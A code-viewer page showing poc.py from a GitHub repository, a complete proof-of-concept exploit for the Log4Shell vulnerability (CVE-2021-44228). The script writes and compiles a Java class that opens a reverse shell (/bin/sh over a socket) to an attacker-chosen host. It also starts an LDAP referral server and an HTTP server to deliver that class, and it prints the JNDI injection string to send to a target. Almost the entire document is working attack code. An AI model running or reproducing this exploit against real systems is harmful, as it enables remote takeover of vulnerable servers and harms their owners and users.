Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
kozmer
GitHub Repository: kozmer/log4j-shell-poc
 Path: blob/main/poc.py
126 views
1
#!/usr/bin/env python3

2


3
import argparse

4
from colorama import Fore, init

5
import subprocess

6
import threading

7
from pathlib import Path

8
import os

9
from http.server import HTTPServer, SimpleHTTPRequestHandler

10


11
CUR_FOLDER = Path(__file__).parent.resolve()

12


13


14
def generate_payload(userip: str, lport: int) -> None:

15
    program = """

16
import java.io.IOException;

17
import java.io.InputStream;

18
import java.io.OutputStream;

19
import java.net.Socket;

20


21
public class Exploit {

22


23
    public Exploit() throws Exception {

24
        String host="%s";

25
        int port=%d;

26
        String cmd="/bin/sh";

27
        Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();

28
        Socket s=new Socket(host,port);

29
        InputStream pi=p.getInputStream(),

30
            pe=p.getErrorStream(),

31
            si=s.getInputStream();

32
        OutputStream po=p.getOutputStream(),so=s.getOutputStream();

33
        while(!s.isClosed()) {

34
            while(pi.available()>0)

35
                so.write(pi.read());

36
            while(pe.available()>0)

37
                so.write(pe.read());

38
            while(si.available()>0)

39
                po.write(si.read());

40
            so.flush();

41
            po.flush();

42
            Thread.sleep(50);

43
            try {

44
                p.exitValue();

45
                break;

46
            }

47
            catch (Exception e){

48
            }

49
        };

50
        p.destroy();

51
        s.close();

52
    }

53
}

54
""" % (userip, lport)

55


56
    # writing the exploit to Exploit.java file

57


58
    p = Path("Exploit.java")

59


60
    try:

61
        p.write_text(program)

62
        subprocess.run([os.path.join(CUR_FOLDER, "jdk1.8.0_20/bin/javac"), str(p)])

63
    except OSError as e:

64
        print(Fore.RED + f'[-] Something went wrong {e}')

65
        raise e

66
    else:

67
        print(Fore.GREEN + '[+] Exploit java class created success')

68


69


70
def payload(userip: str, webport: int, lport: int) -> None:

71
    generate_payload(userip, lport)

72


73
    print(Fore.GREEN + '[+] Setting up LDAP server\n')

74


75
    # create the LDAP server on new thread

76
    t1 = threading.Thread(target=ldap_server, args=(userip, webport))

77
    t1.start()

78


79
    # start the web server

80
    print(f"[+] Starting Webserver on port {webport} http://0.0.0.0:{webport}")

81
    httpd = HTTPServer(('0.0.0.0', webport), SimpleHTTPRequestHandler)

82
    httpd.serve_forever()

83


84


85
def check_java() -> bool:

86
    exit_code = subprocess.call([

87
        os.path.join(CUR_FOLDER, 'jdk1.8.0_20/bin/java'),

88
        '-version',

89
    ], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)

90
    return exit_code == 0

91


92


93
def ldap_server(userip: str, lport: int) -> None:

94
    sendme = "${jndi:ldap://%s:1389/a}" % (userip)

95
    print(Fore.GREEN + f"[+] Send me: {sendme}\n")

96


97
    url = "http://{}:{}/#Exploit".format(userip, lport)

98
    subprocess.run([

99
        os.path.join(CUR_FOLDER, "jdk1.8.0_20/bin/java"),

100
        "-cp",

101
        os.path.join(CUR_FOLDER, "target/marshalsec-0.0.3-SNAPSHOT-all.jar"),

102
        "marshalsec.jndi.LDAPRefServer",

103
        url,

104
    ])

105


106


107
def main() -> None:

108
    init(autoreset=True)

109
    print(Fore.BLUE + """

110
[!] CVE: CVE-2021-44228

111
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

112
""")

113


114
    parser = argparse.ArgumentParser(description='log4shell PoC')

115
    parser.add_argument('--userip',

116
                        metavar='userip',

117
                        type=str,

118
                        default='localhost',

119
                        help='Enter IP for LDAPRefServer & Shell')

120
    parser.add_argument('--webport',

121
                        metavar='webport',

122
                        type=int,

123
                        default='8000',

124
                        help='listener port for HTTP port')

125
    parser.add_argument('--lport',

126
                        metavar='lport',

127
                        type=int,

128
                        default='9001',

129
                        help='Netcat Port')

130


131
    args = parser.parse_args()

132


133
    try:

134
        if not check_java():

135
            print(Fore.RED + '[-] Java is not installed inside the repository')

136
            raise SystemExit(1)

137
        payload(args.userip, args.webport, args.lport)

138
    except KeyboardInterrupt:

139
        print(Fore.RED + "user interrupted the program.")

140
        raise SystemExit(0)

141


142


143
if __name__ == "__main__":

144
    main()

145


146